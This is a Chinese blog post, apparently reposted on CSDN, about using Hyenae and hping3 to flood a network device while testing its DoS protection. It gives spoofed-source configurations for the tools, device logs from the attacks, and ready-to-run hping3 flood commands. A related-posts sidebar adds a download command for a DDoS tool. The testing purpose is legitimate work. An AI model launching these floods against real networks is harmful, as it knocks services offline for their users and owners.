两款实用的DDos攻击工具

最新推荐文章于 2024-04-15 20:55:07 发布
最新推荐文章于 2024-04-15 20:55:07 发布
阅读量6.0w 收藏 313
点赞数 32
分类专栏: 运维 linux 安全 测试 文章标签: ddos 工具 hyenae hping3
运维 同时被 3 个专栏收录
152 篇文章 8 订阅
订阅专栏
linux
148 篇文章 2 订阅
订阅专栏
安全
1 篇文章 0 订阅
订阅专栏

两款实用的DDos攻击工具

2018-02-22Network • Security865

之前为了重现某个bug,需要对网络设备进行ddos攻击测试,同时也是对设备的网络攻击防护功能进行抗压测试。临阵磨枪,google了两款攻击工具,windows平台的hyenae,以及Linux平台的hping3,在此记录一下两者的用法。

Hyenae

hyenae是在Windows平台上非常好用的一款ddos攻击工具,可以完成绝大多数的攻击操作。

download

Features

  • ARP-Request flooding
  • ARP-Cache poisoning
  • PPPoE session initiation flooding
  • Blind PPPoE session termination
  • ICMP-Echo flooding
  • ICMP-Smurf attack
  • ICMP based TCP-Connection reset
  • TCP-SYN flooding
  • TCP-Land attack
  • Blind TCP-Connection reset
  • UDP flooding
  • DNS-Query flooding
  • DHCP-Discover flooding
  • DHCP starvation attack
  • DHCP-Release forcing
  • Cisco HSRP active router hijacking
  • Pattern based packet address configuration
  • Intelligent address and address protocol detection
  • Smart wildcard-based randomization
  • Daemon for setting up remote attack networks - HyenaeFE QT-Frontend support

interface

hyenae interface

hyenae的界面比较简单,图中展示的是SYN/ACK洪泛攻击的配置选项。

  • operation mode中可以选择网卡
  • Network Protocol中可以选择攻击方式对应的网络协议,如SYN洪泛攻击对应传输层的TCPIP协议可选IPv4, IPv6
  • 攻击源的IP,MAC地址以及端口号可以非常灵活的设置,按MAC-IP@port的格式书写,如图中的攻击源匹配模式%-172.17.14.158@80
    • % 代表任意,在此处代表任意的MAC地址
    • 172.17.14.158为伪造的攻击源IP,可以修改为任意的合法IP
    • 80为端口号,80同时也是网络服务器的默认端口
  • 攻击目标的设置方式与攻击源一致,图中的%-172.17.14.10@80
    • % 随机生成MAC地址
    • 172.17.14.10代表被攻击的IP
    • 80为攻击目标的被攻击端口号
  • 针对TCP协议,右侧给出其对应的5个常见flagsFIN, SYN, RST, PSH, ACK
    • 可以随意进行单选或多选,以实现不同的攻击方式
    • 随意的组合可以产生正常通信过程中无法出现的数据包
  • 软件下方可以设置数据包的发送速率,默认为无限速发送,这会暂用大量带宽,导致网络拥塞;当然啦,这个软件本就是为了攻击网络,导致网络瘫痪正是其目的所在
  • 选择不同的攻击方式,会显示相应不同的配置选项

简单说,这幅图的作用是产生MAC地址随机,IP172.17.14.158,端口为80的伪造源,去攻击目的MAC随机,IP172.17.14.10web server

由于目的MAC随机,当MAC地址首字节为奇数时,生成的数据包为广播包,此时将产生广播风暴,局域网内的所有设备都将收到大量的广播包,当速率很高时,很容易导致局域网瘫痪,这是需要注意的。本人当时年少轻狂,有次测试,使用全速率的广播式SYN/ACK攻击,直接导致部门的局域网瘫痪断网,幸好是晚上,后来找人重置了部门内的网络设备才恢复,想想真是罪过啊。

Use cases

  • Land Attack
    • src: %-172.17.14.94@53
    • des: %-172.17.14.94@80
 
  1. DoS *** 3118 *** {Land Attack} are suppressed!
  2. [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  3. [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  4. [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  • SYN/ACK scan (TCP SYN ACK)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
 
  1. DoS *** 3896 *** {SYN/ACK Scan} are suppressed!
  2. [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  • ping flood (icmp echo)
    • src: %-172.17.14.8
    • des: %-172.17.14.94
 
  1. DoS *** 1881 *** {Ping Flood} are suppressed!
  2. [DoS Attack: Ping Flood] from source: 172.17.14.8,
  3. [DoS Attack: Ping Flood] from source: 172.17.14.8,
  4. [DoS Attack: Ping Flood] from source: 172.17.14.8,
  • ping sweep (icmp echo)
    • src: %-%
    • des: %-%
 
  1. DoS *** 1719 *** {Ping Sweep} are suppressed!
  2. [DoS Attack: Ping Sweep] from source: 188.167.1.1,
  3. [DoS Attack: Ping Sweep] from source: 113.172.1.5,
  4. [DoS Attack: Ping Sweep] from source: 175.181.2.6,
  • RST Scan(TCP RST)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
 
  1. DoS *** 4023 *** {RST Scan} are suppressed!
  2. [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  • ACK scan (TCP ACK)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
 
  1. DoS *** 3989 *** {ACK Scan} are suppressed!
  2. [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80
  • FIN scan(TCP FIN)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
 
  1. DoS *** 3009 *** {FIN Scan} are suppressed!
  2. [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,

hping3

hping3是用于生成和解析TCPIP协议数据包的开源工具

hping3同样可用于产生ddos攻击包,但与hyenae不同的是,hping3无法手动设置MAC地址,而是根据IP地址自动获取

需要注意的是,如果使用搬瓦工购买的vps向公网IP执行hping3攻击的话,最好不要尝试,如果要用也一定记得限速,否则就会被警告并关停,当然你有3次机会重置

vps warning

examples

 
  1. # land attack
  2. $ sudo hping3 -V -c 10000 -d 120 -S -w 64 --keep -p 80 -s 20000 --flood -a 172.17.14.52 172.17.14.52
  3. # syn/ack attack
  4. $ sudo hping3 -V -c 10000 -d 120 -S -A -w 64 --keep -p 80 -s 80 --flood -a 172.17.14.192 172.17.14.52
  5.  
  6. # -V verbose
  7. # -c packet count
  8. # -d data size
  9. # -p destPort
  10. # -s srcPort
  11. # -a srcIP
  12. # -S SYN tag
  13. # -A ACK tag
  14. # -w winsize
  15. # -I interface

reference

转自:  https://www.litreily.top/2018/02/22/ddos-attack/

Man_In_The_Night
关注
  • 32
    点赞
  • 313
    收藏
    觉得还不错? 一键收藏
  • 18
    评论
专栏目录
php ddos 工具
08-17
php ddos 工具php ddos 工具php ddos 工具php ddos 工具
用于DDOS攻击的检测工具
04-28
DDOS检测工具,检测DDOS攻击的不错的东东。
【网络安全】免费DDOS攻击测试工具
Javachichi的博客
01-16 7037
DoS(Denial Of Service)攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃。然而随着网络上免费的可用DDOS工具增多,Dos攻击也日益增长,下面介绍几款Hacker常用的Dos攻击工具。‍‍LOTC是一个最受欢迎的DOS攻击工具。这个工具被去年流行的黑客集团匿名者用于对许多大公司的网络攻击。
配置DDoS高防后获取真实的请求来源IP
九河云的创作之路
03-04 461
业务接入DDoS高防后,到达源站的所有业务流量都由DDoS高防转发,源站服务器通常可以通过解析回源请求中的X-Forwarded-For记录或者安装TOA模块,获取客户端的真实IP。本文九河云介绍如何获取真实的请求来源IP。
黑客DDOS原理及如何防御(附工具下载地址)
leah126的博客
02-11 1442
由于发送的数据包大于服务器可以处理的数据包,因此服务器可能会冻结,重新启动或崩溃。这种类型的攻击通常是通过同时点击具有太多请求的目标资源(例如Web服务器)来实现的。在您未被授权的网络上,DOS攻击是非法的。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。DOS是一种攻击,用于拒绝合法用户访问某个资源,例如访问网站,网络,电子邮件等,或者使其速度极慢。- 这种类型的攻击由许多受到攻击的计算机执行,这些计算机都针对同一个受害者。
HyenaeFE-开源
05-02
HyenaeFE是Hyenae高级网络数据包生成器的基于QT的前端。
DOS攻击工具介绍
frankwhere的博客
03-24 6579
DoS(Denial Of Service)攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源, 目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃 然而随着网络上免费的可用DDoS工具增多,DoS攻击也日益增长,下面介绍几款Hacker常用的DoS攻击工具。 特别提示:仅用于攻防演练及教学测试用途,禁止非法使用。 1、卢瓦(LO...
DDoS攻击工具介绍
因上努力,果上随缘。但行好事,莫问前程。
08-08 5473
低轨道离子加农炮是通常用于发起DoS和DDoS攻击工具。它最初是由Praetox Technology作为网络压力测试应用程序而开发的,但此后成为开源软件,现在主要被用于恶意目的。它以非常易于使用且易于获取的特性而闻名,并且因为被黑客组织Anonymous的成员以及4Chan论坛的用户使用而臭名昭彰。通过使用该工具,几乎毫无技术知识的用户都可以发起DDoS攻击。......
DDOS工具-DDoS-Ripper
siu~
08-15 602
DDos Ripper 是一种分布式拒绝服务 (DDOS) 攻击服务器,可在大量互联网流量中切断目标或周围基础设施
最常见DDOS攻击工具有哪些?怎么防御DDOS攻击
weixin_67757219的博客
02-01 1920
Amplification attacks是一种DDoS(分布式拒绝服务)攻击类型,它通过利用可放大数据流量的网络服务,以更少的数据流量对目标网站造成更大的影响。这些感染的计算机受到攻击者的控制,可以同时发送大量的数据流量到目标网站,导致DDoS(分布式拒绝服务)攻击。这可以通过加强网络基础设施,使用DDoS防护服务,启用流量管理和限制,增加网络监控和分析,对流量进行分类和识别以及启用多层防护来实现。同时,网络服务提供商可以采取技术措施,如限制大量的数据流量和识别Botnets等,以防止DDoS攻击
DDoS攻击--防护本质
02-24
DDoS全称DistributedDenialofService,中文意思为“分布式拒绝服务”,俗称洪水攻击,就是利用大量合法的分布式服务器对目标发送请求,从而导致正常合法用户无法获得服务。服务:系统提供的,用户在对其使用中会受益的功能拒绝服务:任何对服务的干涉如果使其可用性降低或者失去可用性均称为拒绝服务拒绝服务攻击:是指攻击者通过某种手段,有意地造成计算机或网络不能正常运转从而不能向合法用户提供所需要的服务或者使得服务质量降低分布式拒绝服务攻击:处于不同位置的多个攻击者同时向一个或者数个目标发起攻击,或者一个或多个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击,由于攻
HSRP-VLAN.pkt
12-08
HSRP-VLAN.pkt
防御DDoS攻击实用指南 守住你的网站
09-30
随着Internet互联网络带宽的增加和多种DDoS黑客工具的不断发布,DDoS拒绝服务攻击的实施越来越轻易,DDoS攻击事件正在成上升趋势。
穿盾DDos攻击流量监控器 v1.0
03-09
软件介绍 穿盾ddos监控器是穿盾ddos科技推出的一款专门监视服务器中各种流量信息的工具,现在免费提供给大家使用。 界面简单直观反映当前服务器流量信息,DOS攻击状态监视器 可查看SYN、ACK、碎片、UDP、ICMP攻击的攻击频率方便站长与服务器管理员观看自己的网络状况 是否遭受DDOS攻击,让站长快速分辨网络状态及时处理ddos攻击故障
移动设备或将成为未来的DDoS攻击工具
10-18
虽然目前还没有移动设备被用于DDoS攻击,但分析师认为这只是时间问题。
网络安全产品---扛DDOS产品
嘿嘿嘿
04-15 626
分布式拒绝服务攻击(Distributed Denial of Service attack)
node-v19.8.0-darwin-arm64.tar.xz
最新发布
04-22
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v18.5.0-darwin-arm64.tar.xz
04-22
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
kali 下载ddos攻击工具
08-24
在Kali Linux中下载DDoS攻击工具,你可以使用以下命令: 1. 打开终端 2. 输入命令:`git clone https://github.com/Andysun06/ddos` 这将克隆DDoS攻击工具的存储库到你的本地计算机中。请确保你已经安装了Git工具,以便能够执行以上命令。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [kali中安装DDoS攻击本地发包](https://blog.csdn.net/m0_73895181/article/details/130334502)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [在kali使用DDos-Attack 进行DDos攻击](https://blog.csdn.net/qq_56418482/article/details/127268445)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值